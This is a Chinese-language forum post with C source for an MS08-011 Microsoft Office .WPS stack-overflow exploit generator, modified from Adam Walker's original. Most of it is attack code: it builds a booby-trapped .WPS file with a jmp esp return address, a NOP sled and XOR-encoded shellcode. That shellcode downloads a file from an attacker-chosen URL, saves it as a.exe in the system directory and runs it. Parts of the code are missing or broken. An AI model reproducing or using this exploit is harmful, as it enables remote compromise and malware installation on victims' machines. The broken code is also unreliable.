Microsoft Office .WPS Exploit (MS08-011)mika修改加强版


前两天就看到这个exp了,漏洞本身俺就不多说了,非常简单的栈溢出,exp都给了用od或者windbg跟一下就出来了,这里俺要非常感谢gyzy 哥哥对俺的帮助,当俺一拿到exp的时候就非常庆幸,感觉会很容易修改(事实也是如此),于是俺就修改了ret地址,然后把俺原来用的shellcode (下载执行的)替换exp里执行calc的,但是没有成功,word一闪而过,也没报错也没下载。然后再看了看原exp的shellcode,发现是 alpha2编码过的,于是俺想当然的以为俺的shellcode也得编码,可是编码发现还是不能运行而且出现错误了,俺单独把编码过的 shellcode拿出来执行却能成功,百思不得其解不得不求助俺bf,他让俺自己去找人请教,俺只好上qq求助gyzy哥哥了,哥哥就是哥哥啊,说 shellcode有问题于是给了俺一个lion牛牛写的那个经典的下载执行的shellcode,俺换上去一试果然就行了。痛苦啊!~~~在此向 gyzy还有lion哥哥们致敬!

关于这个漏洞的测试俺需要说明一下,漏洞是因为office在打开wps格式的文件进行转换时出现了漏洞,所以需要安装转换器。不过我在安装office 2003的时候默认是安装了转换器的
我添加了对简体中文和繁体中文系统的支持,在windows xp sp2+microsot office 2003 sp2上测试成功!


#include <stdio.h>
#include <winsock2.h>
#include <windows.h>

#pragma comment(lib, "ws2_32")

#define NOPS "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
// Use for find the ASM code
#define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90\
__asm _emit 0x90 __asm _emit 0x90\
__asm _emit 0x90 __asm _emit 0x90\
__asm _emit 0x90 __asm _emit 0x90
#define SEARCH_STR "\x90\x90\x90\x90\x90\x90\x90\x90\x90"
#define SEARCH_LEN 8
#define MAX_SC_LEN 2048
#define HASH_KEY 13

// Define Decode Parameter
#define DECODE_LEN 21
#define SC_LEN_OFFSET 7
#define ENC_KEY_OFFSET 11
#define ENC_KEY 0x99

// Define Function Addr
#define ADDR_LoadLibraryA [esi]
#define ADDR_GetSystemDirectoryA [esi+4]
#define ADDR_WinExec [esi+8]
#define ADDR_ExitProcess [esi+12]
#define ADDR_URLDownloadToFileA [esi+16]
//#define ADDR_URL edi

// Need functions
unsigned char functions[100][128] =
{ // [esi] stack layout
// kernel32 4 // 00 kernel32.dll
{"LoadLibraryA"}, // [esi]
{"GetTempPathA"}, // [esi+4]{"GetSystemDirectoryA"}
{"WinExec"}, // [esi+8]
{"ExitProcess"}, // [esi+12]
// urlmon 1 // 01 urlmon.dll
{"URLDownloadToFileA"}, // [esi+16]

/* WPS Header */
unsigned char uszWpsHeader[] =

char szIntro[] =
"[+] Targets:\n"
"\t(1) Windows XP SP2 ntdll.dll DE jmpesp\n"
"\t(2) Windows XP SP2 ntdll.dll CN&TW jmpesp\n"
"Usage: wps.exe <target> <file> <URL>\n"
".Ex:wps.exe 2 test.wps\n";

struct {
const char *szTarget;
unsigned char uszRet[5];
}targets[] = {
{"Windows XP SP2 DE ntdll.dll jmpesp", "\xED\x1E\x94\x7C"},/* jmp esp */
{"Windows XP SP2 CN&TW ntdll.dll jmpesp","\xED\x1E\x96\x7C"},
// Shellcode string
unsigned char sc[1024] = {0};

unsigned char url[256]={0};

// ASM shellcode main function
void ShellCode();

// Get function hash
static DWORD __stdcall GetHash ( char *c )
DWORD h = 0;

while ( *c )
__asm ror h, HASH_KEY

h += *c++;
return( h );

void Make_ShellCode()
unsigned char *pSc_addr;
unsigned int Sc_len;
unsigned int Enc_key=ENC_KEY;
unsigned long dwHash[100];
unsigned int dwHashSize;

int i,j,k,l;

// Get functions hash
//printf("[+] Get functions hash strings.\r\n");
for (i=0;;i++)
if (functions[i][0] == '\x0') break;
dwHash[i] = GetHash((char*)functions[i]);
//printf("\t%.8X\t%s\n", dwHash[i], functions[i]);
dwHashSize = i*4;

// Deal with shellcode
pSc_addr = (unsigned char *)ShellCode;

for (k=0;k<MAX_SC_LEN;++k )
if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0)
pSc_addr+=(k+SEARCH_LEN); // Start of the ShellCode

for (k=0;k<MAX_SC_LEN;++k)
if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0) {
Sc_len=k; // Length of the ShellCode

memcpy(sc, pSc_addr, Sc_len); // Copy shellcode to sc[]

// Add functions hash
memcpy(sc+Sc_len, (char *)dwHash, dwHashSize);
Sc_len += dwHashSize;

// Add url
memcpy(sc+Sc_len, url, strlen(url)+1);
Sc_len += strlen(url)+1;

// Print the size of shellcode.
//printf("[+] %d + %d + %d = %d bytes shellcode\n", DECODE_LEN, Sc_len-DECODE_LEN-sizeof(url)+1, sizeof(url)-1, Sc_len);
// Print shellcode
//PrintSc(sc, Sc_len);

// Deal with find the right XOR byte
for(i=0xff; i>0; i--)
l = 0;
for(j=DECODE_LEN; j<(int)Sc_len; j++)
if (
((sc[j] ^ i) == 0x26) || //%
((sc[j] ^ i) == 0x3d) || //=
((sc[j] ^ i) == 0x3f) || //?
((sc[j] ^ i) == 0x40) || //@
((sc[j] ^ i) == 0x00) ||
((sc[j] ^ i) == 0x0D) ||
((sc[j] ^ i) == 0x0A)
) // Define Bad Characters
l++; // If found the right XOR byte,l equals 0

if (l==0)
Enc_key = i;

//printf("[+] Find XOR Byte: 0x%02X\n", i);
for(j=DECODE_LEN; j<(int)Sc_len; j++)
sc[j] ^= Enc_key;

break; // If found the right XOR byte, Break

// Deal with not found XOR byte
if (l!=0)
printf("[-] No xor byte found!\r\n");

// Deal with DeCode string
*(unsigned char *)&sc[SC_LEN_OFFSET] = Sc_len;
*(unsigned char *)&sc[ENC_KEY_OFFSET] = Enc_key;

// Print decode
//printf("/* %d bytes decode */\r\n", DECODE_LEN);
//PrintSc(sc, DECODE_LEN);

// Print shellcode
//printf("/* %d bytes shellcode, xor with 0x%02x */\r\n", Sc_len-DECODE_LEN, Enc_key);
//PrintSc((char*)sc+DECODE_LEN, Sc_len-DECODE_LEN);

int main( int argc, char **argv ) {
FILE *f;
char szBuffer[1024*10];

printf("\n\t\tMicrosoft Office .WPS Stack Overflow\n"
"\t\t\tAdam Walker (c) 2007\n"
"\t\t\tModified by Mika[EST]\n\n");
if ( argc < 4 ) {
printf("%s\n", szIntro );
return 0;
printf("[+] download url:%s\n", url);
printf("[+] Generating Shellcode...\n");

memset(szBuffer, 0x90, 1024*10);
printf("[+] Creating WPS header...\n");
memcpy( szBuffer, uszWpsHeader, sizeof( uszWpsHeader ) - 1 );
printf("[+] Copying addr && nops && shellcode...\n");
memcpy( szBuffer + sizeof( uszWpsHeader ) - 1, targets[atoi(argv[1])-1].uszRet, 4 );
memcpy(szBuffer + sizeof( uszWpsHeader ) + 3,NOPS,16);
memcpy( szBuffer + sizeof( uszWpsHeader ) + 3+16, sc, sizeof( sc ) - 1 );

f = fopen( argv[2], "wb" );
if ( f == NULL ) {
printf("[-] Cannot create file\n");
return 0;

fwrite( szBuffer, 1, sizeof( szBuffer) , f );
fclose( f );
printf("[+] .WPS file succesfully created!\n");
printf("[+]Mika is telling you:don't play with fire!^_^\n");
return 0;

// ShellCode function
void ShellCode()
PROC_BEGIN // C macro to begin proc
// DeCode
jmp short decode_end

pop ebx // Decode start addr (esp -> ebx)
dec ebx
xor ecx,ecx
mov cl,0xFF // Decode len

xor byte ptr [ebx+ecx],0x99 // Decode key
loop decode_loop
jmp short decode_ok

call decode_start


// ShellCode
jmp sc_end

pop edi // Hash string start addr (esp -> edi)

// Get kernel32.dll base addr
mov eax, fs:0x30 // PEB
mov eax, [eax+0x0c] // PROCESS_MODULE_INFO
mov esi, [eax+0x1c] // InInitOrder.flink
lodsd // eax = InInitOrder.blink
mov ebp, [eax+8] // ebp = kernel32.dll base address

mov esi, edi // Hash string start addr -> esi

// Get function addr of kernel32
push 4
pop ecx

call GetProcAddress_fun
loop getkernel32

// Get function addr of urlmon
push 0x00006e6f
push 0x6d6c7275 // urlmon
push esp
call ADDR_LoadLibraryA // LoadLibraryA("urlmon");

mov ebp, eax // ebp = urlmon.dll base address

push 1
pop ecx

call GetProcAddress_fun
loop geturlmon
call GetProcAddress_fun

// url start addr = edi

sub esp, 0x300
mov ebx, esp

push ebx
push 0x300
call ADDR_GetSystemDirectoryA // GetSystemDirectoryA

// eax = system path size
// URLDownloadToFileA url save to a.exe
mov dword ptr [ebx+eax], 0x7261725C // "\a.e"
mov dword ptr [ebx+eax+0x4], 0x6578652E // "xe"
xor eax, eax
push eax
push eax
push ebx // %systemdir%\a.exe
push edi // url
push eax
call ADDR_URLDownloadToFileA // URLDownloadToFileA

mov ebx, esp
push eax
push ebx
call ADDR_WinExec // WinExec(%systemdir%\a.exe);

//push 1
call ADDR_ExitProcess // ExitProcess();

push ecx
push esi

mov esi, [ebp+0x3C] // e_lfanew
mov esi, [esi+ebp+0x78] // ExportDirectory RVA
add esi, ebp // rva2va
push esi
mov esi, [esi+0x20] // AddressOfNames RVA
add esi, ebp // rva2va
xor ecx, ecx
dec ecx

inc ecx
add eax, ebp
xor ebx, ebx

movsx edx, byte ptr [eax]
cmp dl, dh
jz short find_addr
ror ebx, HASH_KEY // hash key
add ebx, edx
inc eax
jmp short hash_loop

cmp ebx, [edi] // compare to hash
jnz short find_start
pop esi // ExportDirectory
mov ebx, [esi+0x24] // AddressOfNameOrdinals RVA
add ebx, ebp // rva2va
mov cx, [ebx+ecx*2] // FunctionOrdinal
mov ebx, [esi+0x1C] // AddressOfFunctions RVA
add ebx, ebp // rva2va
mov eax, [ebx+ecx*4] // FunctionAddress RVA
add eax, ebp // rva2va
stosd // function address save to [edi]

pop esi
pop ecx

call sc_start

PROC_END //C macro to end proc



Microsoft Office .WPS Stack Overflow
Adam Walker (c) 2007
Modified by Mika[EST]

[+] Targets:
(1) Windows XP SP2 ntdll.dll DE jmpesp
(2) Windows XP SP2 ntdll.dll CN&TW jmpesp
Usage: wps.exe <target> <file> <URL>
.Ex:wps.exe 2 test.wps

wps.exe 目标系统语言类型 要生成的文件 要下载执行的url地址


wps.rar(18.54 KB)

